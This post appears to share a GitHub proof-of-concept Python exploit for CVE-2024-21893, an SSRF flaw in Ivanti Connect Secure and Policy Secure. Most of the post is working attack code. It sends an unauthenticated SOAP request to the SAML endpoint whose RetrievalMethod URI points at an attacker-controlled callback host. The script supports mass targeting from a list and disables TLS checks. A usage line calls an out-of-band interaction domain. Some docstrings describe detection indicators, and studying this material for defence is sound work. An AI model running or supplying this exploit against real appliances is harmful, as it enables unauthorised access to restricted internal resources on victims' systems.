CVE-2024-21893 is a server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA that allows an attacker to access certain restricted resources without authentication.
github.com
GitHub - h4x0r-dz/CVE-2024-21893.py: CVE-2024-21893: SSRF Vulnerability in Ivanti Connect Secure
CVE-2024-21893: SSRF Vulnerability in Ivanti Connect Secure - h4x0r-dz/CVE-2024-21893.py
run python CVE-2024-21893.py -u target.com -a http://xxxxxxxxx.oastify.com
Python:
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import argparse
from urllib.parse import urlparse
def ensure_http(url):
    """Return *url* with a scheme, defaulting to ``https://``.

    The input is returned unchanged when it already begins with
    ``http://`` or ``https://``. The comparison is case-sensitive, so a
    value such as ``HTTP://host`` is treated as having no scheme and gets
    ``https://`` prepended. No other validation of the URL is performed.
    """
    has_scheme = url.startswith(("http://", "https://"))
    return url if has_scheme else f"https://{url}"
def send_poc(target_url, attacker_server):
    """POST the CVE-2024-21893 test envelope to one host and print a status line.

    What the request looks like on the wire (useful when writing detections
    or reviewing appliance and proxy logs):

    * An unauthenticated ``POST`` with ``Content-Type: text/xml``. When the
      supplied URL has no path, the path defaults to ``/dana-ws/saml20.ws``.
    * A SOAP body holding an XML-DSig ``Signature`` whose ``KeyInfo`` contains
      a ``RetrievalMethod`` element; its ``URI`` attribute is set to
      ``attacker_server`` verbatim (the value is not XML-escaped).
    * A fixed ``User-Agent`` of ``curl/8.4.0``. This is a property of this
      script only, so it is a weak indicator on its own.

    Caveats:

    * ``verify=False`` turns off TLS certificate validation for the request.
    * The HTTP response is discarded, so the printed line says nothing about
      whether the host is vulnerable or patched.
    * The message is printed only after ``requests.post`` has returned.

    Args:
        target_url: Host or URL to send the request to; a missing scheme is
            filled in by ``ensure_http``.
        attacker_server: URL placed in the ``RetrievalMethod`` ``URI``.
    """
    envelope_template = """<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
</ds:SignedInfo>
<ds:SignatureValue>qwerty</ds:SignatureValue>
<ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig#" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:RetrievalMethod URI="{attacker_server}"/>
<ds:X509Data/>
</ds:KeyInfo>
<ds:Object></ds:Object>
</ds:Signature>
</soap:Body>
</soap:Envelope>"""

    # Normalise first: the printed message below reports the normalised URL.
    target_url = ensure_http(target_url)
    body = envelope_template.format(attacker_server=attacker_server)

    parts = urlparse(target_url)
    # An empty path means the caller gave only a host; fall back to the
    # SAML web-service path this script uses by default.
    endpoint_path = parts.path or "/dana-ws/saml20.ws"
    endpoint = f"{parts.scheme}://{parts.netloc}{endpoint_path}"

    request_headers = {
        "Content-Type": "text/xml",
        "User-Agent": "curl/8.4.0",
        "Accept": "*/*",
        "Connection": "close",
        "Content-Length": str(len(body)),
    }

    # The response object is intentionally not kept: the original never reads it.
    requests.post(endpoint, data=body, headers=request_headers, verify=False)
    print(f"Sending PoC to {target_url}...")
def main():
    """Parse the command line and call ``send_poc`` for each requested host.

    Options:
        -u / --url: a single URL.
        -l / --list: path to a text file with one URL per line; lines that
            are blank after stripping whitespace are skipped.
        -a: required; passed through unchanged as ``send_poc``'s second
            argument.

    ``-u`` takes precedence: when both ``-u`` and ``-l`` are supplied, the
    list file is never opened. With neither, a usage hint is printed and
    nothing is sent.
    """
    cli = argparse.ArgumentParser(description='Send PoC to a target or targets from a list.')
    cli.add_argument('-u', '--url', type=str, help='Single target URL')
    cli.add_argument('-l', '--list', type=str, help='File path for a list of target URLs')
    cli.add_argument('-a', type=str, required=True, help='Attacker server URL')
    opts = cli.parse_args()

    if not (opts.url or opts.list):
        print("No target specified. Use -u for a single target or -l for a list of targets.")
        return

    if opts.url:
        send_poc(opts.url, opts.a)
        return

    with open(opts.list, 'r') as handle:
        for entry in (raw.strip() for raw in handle):
            if entry:
                send_poc(entry, opts.a)
# Run the command-line interface only when the file is executed directly,
# so importing the module does not send any request.
if __name__ == "__main__":
    main()